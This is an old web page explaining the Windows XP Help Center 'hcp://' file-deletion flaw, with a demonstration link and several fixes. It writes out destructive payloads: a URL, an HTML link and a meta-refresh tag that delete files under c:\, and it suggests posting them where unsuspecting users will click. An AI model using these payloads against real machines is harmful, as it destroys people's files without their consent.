Accuweather
Forecast
Enter your location
by zipcode or city, state, and then click the Get Forecast
button.
Featured
Links
Driver
Guide
Free
Programs
Major
Geeks Slashdot.org
CD
Ripping Info
Ripping
Guides
News
Search
The
Register
Wired
News
Need long distance or other telecom services? Get cheap phone rates here!
Windows XP Security Flaw - Fix it Now!
Quick Fix: Download and run a small program called XPdite, and/or read on for an explanation and safe demonstration of the "Help" exploit. This demo will not harm your computer.
There has been a very serious flaw discovered in, ironcally, the "Help Center" included in Windows XP. This flaw is considered critical because a malicious URL (web-style link) could be delivered to any XP user through any means: via an eMail solicitation, a chat room, a newsgroup posting, a malicious web page, or even processed automatically without the user clicking anything - but by merely visiting a malicious web page. More information about a fix for this exploit can be found here.
Windows XP Service Pack 1 will also fix this nasty security flaw. If you need to adjust the Windows XP Product Activation Key to allow Service Pack 1 installation, you want to know this Windows hack. Wow, Microsoft should really hire some competent staff...
Demonstration
To try it out, do the following, but, BE WARNED, it will delete ANYTHING you put in the "test" directory. (I should point out, sub-directories aren't deleted, and user permissions may have an effect)
Create a folder called "test" at the root directory of your hard drive. (i.e: c:\test\) Put some files in it (junk, files you don't care about losing - create some new text documents or something).
Then, copy and paste the "link" below into your address bar and hit enter.
Wait a few seconds, the "Help Center" should pop up.. then, once you've closed the help center, check that directory again. You should notice the files in the directory you created are gone..
This should be frightening to any Windows XP user, because anyone could link it on any webpage.. definatly a terrible flaw in the Windows Help Center included in XP.
copy and paste this link into your address bar and hit enter..
hcp://system/DFS/uplddrvinfo.htm?file://c:\test\* - or click here.
If someone were
feeling particularly malicious, they could, for example:
* paste something like "hcp://system/DFS/uplddrvinfo.htm?file://c:\\*"
on IRC channels full of dumb kids..
* <a href="hcp://system/DFS/uplddrvinfo.htm?file://c:\\*">Windows
XP Rox0rz</a> ..
* <meta http-equiv="Refresh" content="1;hcp://system/DFS/uplddrvinfo.htm?file://c:\\*">
..
(i'm aware deleting
c:\* on an XP machine wont accomplish much - you get the idea though..)
Easy Fix(es)
- Delete or Rename the file: "C:\WINDOWS\PCHEALTH\HELPCTR\System\DFS\uplddrvinfo.htm"
-
Find and Remove the following code from "uplddrvinfo.htm"
var oFSO = new ActiveXObject ( "Scripting.FileSystemObject" );
try
{
oFSO.DeleteFile( sFile );
} - Download and run a small program called XPdite.
- Install Linux
;p
And a great thanks to Angus Turnbull, for providing a clean, quick script
for my drop-down menus. This script and some other very cool Web page stuff
can be found at Twin
Helix .
